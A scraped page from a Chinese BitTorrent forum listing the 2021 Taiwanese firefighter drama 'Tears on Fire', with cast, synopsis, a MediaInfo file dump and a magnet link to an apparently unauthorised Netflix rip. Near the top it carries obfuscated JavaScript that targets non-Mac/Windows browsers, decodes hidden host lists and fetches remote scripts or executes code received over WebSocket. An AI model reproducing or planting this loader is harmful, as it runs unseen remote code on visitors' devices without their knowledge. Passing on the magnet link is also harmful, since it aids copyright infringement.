火神的眼泪[全10集][国语内封繁体软字幕&外挂英字.无水印][NF.WEB-DL-MKV][1080P/迅雷下载][Nyaa]

版主小s 1月前 518

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};


◎译  名 火神的眼泪 / Tears on Fire

◎片  名 火神的眼淚

◎年  代 2021

◎产  地 中国台湾

◎类  别 剧情 / 动作

◎语  言 汉语普通话,闽南语

◎上映日期 2021-05-01(中国台湾)

◎IMDb评分 8.3/10 from 149 users

◎IMDb链接 https://www.imdb.com/title/tt14597334

◎豆瓣评分 9.1/10 from 6620 users

◎豆瓣链接 https://movie.douban.com/subject/34927980

◎集  数 10

◎片  长 48分钟

◎导  演 蔡银娟 Yin-Chuan Tsai

◎编  剧 蔡银娟 Yin-Chuan Tsai

◎主  演 温升豪 James Wen

       陈庭妮 Annie Chen

       林柏宏 Austin Lin

       刘冠廷 Kuan-ting Liu

       夏腾宏 Teng-Hung Hsia

       胡释安 Shawn Hu

       谢章颖 Chang-Ying Hsieh


◎标  签 台剧 | 台湾 | 台湾电视剧 | 电视剧 | 刘冠廷 | 林柏宏 | 臺灣 | 剧集


◎简  介


  故事描述一群大员市消防局同安分队的消防队员,在每次面临惊险的打火、救护与救援任务中看见人性与社会百态,透过他们执行的案件揭露许多消防职业不为人知的心酸故事。


General

Unique ID                      : 194282486646961952935020230125349717194 (0x922972248EFF687487BCC0C1AD7744CA)

Complete name                  : G:\火神的眼泪\Tears on Fire.S01E04.2021.Netflix.WEB-DL.1080p.x264.DDP.mkv

Format                         : Matroska

Format version                 : Version 4

File size                      : 1.49 GiB

Duration                       : 48 min 14 s

Overall bit rate               : 4 417 kb/s

Encoded date                   : UTC 2021-05-15 14:21:28

Writing application            : mkvmerge v56.1.0 ('My Friend') 64-bit

Writing library                : libebml v1.4.2 + libmatroska v1.6.4


Video

ID                             : 1

Format                         : AVC

Format/Info                    : Advanced Video Codec

Format profile                 : [email protected]

Format settings                : CABAC / 4 Ref Frames

Format settings, CABAC         : Yes

Format settings, Reference fra : 4 frames

Codec ID                       : V_MPEG4/ISO/AVC

Duration                       : 48 min 14 s

Bit rate                       : 3 775 kb/s

Width                          : 1 920 pixels

Height                         : 1 080 pixels

Display aspect ratio           : 16:9

Frame rate mode                : Constant

Frame rate                     : 29.970 (30000/1001) FPS

Color space                    : YUV

Chroma subsampling             : 4:2:0

Bit depth                      : 8 bits

Scan type                      : Progressive

Bits/(Pixel*Frame)             : 0.061

Stream size                    : 1.27 GiB (85%)

Default                        : Yes

Forced                         : No


Audio

ID                             : 2

Format                         : E-AC-3

Format/Info                    : Enhanced AC-3

Commercial name                : Dolby Digital Plus

Codec ID                       : A_EAC3

Duration                       : 48 min 14 s

Bit rate mode                  : Constant

Bit rate                       : 640 kb/s

Channel(s)                     : 6 channels

Channel layout                 : L R C LFE Ls Rs

Sampling rate                  : 48.0 kHz

Frame rate                     : 31.250 FPS (1536 SPF)

Compression mode               : Lossy

Delay relative to video        : -66 ms

Stream size                    : 221 MiB (14%)

Title                          : 國語

Language                       : Chinese

Service kind                   : Complete Main

Default                        : Yes

Forced                         : No


Text

ID                             : 3

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 44 min 6 s

Bit rate                       : 56 b/s

Count of elements              : 759

Stream size                    : 18.1 KiB (0%)

Title                          : 繁中

Language                       : Chinese

Default                        : Yes

Forced                         : No


TAGS 动作 剧情

磁力链:
  • magnet:?xt=urn:btih:2426F2241B860F8B465740331CFB8F5A2ACFA629
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回